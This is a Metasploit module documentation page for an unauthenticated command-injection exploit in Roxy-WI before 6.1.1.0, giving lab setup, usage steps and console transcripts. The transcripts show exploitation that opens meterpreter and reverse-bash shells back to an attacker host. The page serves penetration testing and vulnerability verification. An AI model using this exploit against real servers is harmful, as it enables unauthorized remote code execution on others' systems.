adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
fc3b08fb8b97539d016878eb774df28362c444e3
metasploit-gs/documentation/modules/exploit/linux/http/roxy_wi_exec.md
T
Nuri Çilengir fc3b08fb8b Apply suggestions from code review 
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
2022-07-22 12:51:40 +00:00

3.2 KiB
Raw Blame History

Vulnerable Application

Description

This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user.

Setup

Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.

https://roxy-wi.org/installation.py#manual

git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x haproxy-wi/app/*.py 
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/roxy_wi_exec
  4. Set RHOST to the address of the target Roxy-WI machine.
  5. Set LHOST to the address of your attacking machine.
  6. Run exploit
  7. Do: run
  8. You should get a shell as the user running the Roxy-WI server.

Options

Set TAGETURI if the Roxy-WI is installed at a custom path.

TARGETURI

The base path to Roxy-WI. The default value is /

Scenarios

msf6 > use exploit/linux/http/roxy_wi_exec 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Sending stage (40164 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:37394) at 2022-07-21 13:49:23 +0300
[+] Exploit successfully executed.

meterpreter > pwd
/var/www/haproxy-wi/app

You can also use cmd payloads.

msf6 > use exploit/linux/http/roxy_wi_exec 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
[+] Exploit successfully executed.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)```
Reference in New Issue View Git Blame Copy Permalink